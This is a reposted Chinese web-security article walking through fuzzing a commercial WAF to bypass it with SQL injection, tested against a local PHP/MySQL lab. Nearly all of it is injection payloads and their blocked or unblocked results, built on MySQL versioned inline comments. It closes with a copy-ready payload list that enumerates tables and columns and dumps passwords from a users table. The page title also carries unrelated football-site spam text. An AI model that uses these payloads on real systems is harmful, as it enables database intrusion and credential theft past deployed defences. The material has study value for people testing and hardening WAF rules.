安基網 首頁 安全 攻防案例 查看內容

雪缘园足球首页:「WEB安全」某waf實戰SQL注入繞過fuzz過程

英超雪缘园 www.trual.com.cn 2020-1-1 18:25| 投稿: xiaotiger |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: #01 環境簡介服務器:windows2008 R2軟件:phpstudy20180211php 5.4.45mysql 5.5.53某鎖win_3.1.18.13服務端版本#02 Fuzz過程以基于union注入為例fuzz order by過程如下:?id=1' order --+ 不攔截?id=1' order by --+ 攔截nna那應該是waf匹配了order+by?id=1' order /*!by*/ --+ 攔 ...

#01 環境簡介

服務器:windows2008 R2

軟件:phpstudy20180211

php 5.4.45

mysql 5.5.53

某鎖win_3.1.18.13服務端版本

#02 Fuzz過程

以基于union注入為例

fuzz order by

過程如下:

?id=1' order --+ 不攔截

?id=1' order by --+ 攔截


nna那應該是waf匹配了order+by

?id=1' order /*!by*/ --+ 攔截

?id=1' order /*!60000by*/ 1 --+ 不攔截,但是報錯


翻譯過來:您的SQL語法有誤; 檢查與您的MySQL服務器版本相對應的手冊,以在第1行的'1-'LIMIT 0,1'附近使用正確的語法

那么猜測是要低于mysql的版本嗎?(我在fuzz某狗的時候里面的數字要高于50000以上,可能某鎖要低于mysql版本,便隨便試了個200000)

?id=1' order /*!20000by*/ 3 --+ 不攔截,且執行成功


?id=1' /*!20000order*/by 3--+ 不攔截,且執行成功

?id=1' /*!20000order*/by 4--+

用過狗payload去試試,首先替換空格

?id=1' order/**/by --+ 攔截

?id=1' order/*!123*/by --+ 不攔截,但是報錯

換成過夠payload

?id=1' order/*!60000bbb*/by 3 --+ 不攔截,成功繞過

?id=1' order/*!60000bbb*/by 4 --+ 不攔截,報錯

過狗payload在這個位置也是可行的。

fuzz union select 1,2,database()

fuzz過程如下

?id=-1' union --+ 不攔截,報錯…

?id=-1' union select --+ 攔截了,同樣考慮用內聯注釋的方式繞過

?id=-1' union /!20000select*/ --+ 不攔截,報錯…

?id=-1' union /!20000select*/ 1,2,3--+ 不攔截,報錯,這里的報錯就跟前面不一樣了,前面沒加參數肯定錯,但是這里加了,報錯,說明有問題。

內聯注釋恰面的union嘗試一下。

?id=-1' /*!20000union*/ select 1,2,3--+ 攔了

?id=-1' /*!20000union select*/ 1,2,3--+ 攔了

?id=-1' /*!20000union select 1,2,3*/--+ 攔了

那就考慮用union all select

?id=-1' /*!20000union all select 1,2,3*/--+

還是攔截了,在考慮換個注釋的位置

?id=-1' union /*!20000all select 1,2,3*/--+ ok,nice沒攔,執行成功

然后替換參數

?id=-1' union /*!20000all select 1,2,database()*/--+ ok

  • 給我攔了,應該是database()的原因 先加個空格再說

?id=-1' union /*!20000all select 1,2,database ()*/--+

ok 空格繞過了

還可以考慮其他分隔符:

?id=-1' union /*!20000all select 1,2,database/**/()*/--+

同樣可以達到繞過的目的

后面直接貼payload吧

1.?id=1' /*!20000order*/by 3--+
2.?id=-1' union /*!00000all select*/ 1,2,3--+
3.?id=-1' union /*!00000all select*/ 1,database/**/(),3--+
4.?id=-1' union /*!00000all*/ /*!00000select 1,2,table_name from*/ information_schema.tables where table_schema='security' limit 3,1 --+
5.?id=-1' union /*!00000all*/ /*!00000select 1,2,column_name from*/ information_schema.columns where table_name='users' limit 2,1 --+
6.?id=-1' union /*!00000all*/ /*!00000select 1,2,password from*/ users limit 1,1 --+



小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.toutiao.com/a6776148345564955140/

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

相關閱讀

最新評論

 最新
返回頂部
{ganrao}